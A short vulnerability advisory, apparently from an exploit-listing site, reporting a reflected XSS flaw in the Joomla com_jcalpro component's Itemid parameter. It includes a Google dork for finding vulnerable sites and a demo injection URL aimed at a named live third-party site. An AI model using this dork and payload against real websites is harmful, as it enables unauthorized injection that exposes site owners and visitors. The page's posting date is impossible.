Home / os / palm

Joomla Component com_jcalpro XSS

Posted on 30 November -0001

<HTML><HEAD><TITLE>Joomla Component com_jcalpro XSS</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>[x] Joomla Component com_jcalpro [x] Date: 17/07/2016 {x} Dork : inurl:index.php?option=com_jcalpro "itemid" [x] Author: howucan [x] Contact: howucan.gr@gmail.com [x] Website: http://howucan.gr [x] Software link : http://extensions.joomla.org/extension/jcal-pro [x] Bug: XSS on Component com_jcalpro [x] [x] Example: http://www.site.com/index.php?option=com_jcalpro&Itemid=[XSS] [x] [x] Demo: http://www.ekasth.gr/index.php?option=com_jcalpro&Itemid=80%22%3E%3Ch1%3EXSS3D%20By%20howucan%3C/h1%3E&action=edit [x] "Itemid” parameter not sanitized you could inject a XSS vector on the URL and get reflected on the screen.</BODY></HTML>

 

TOP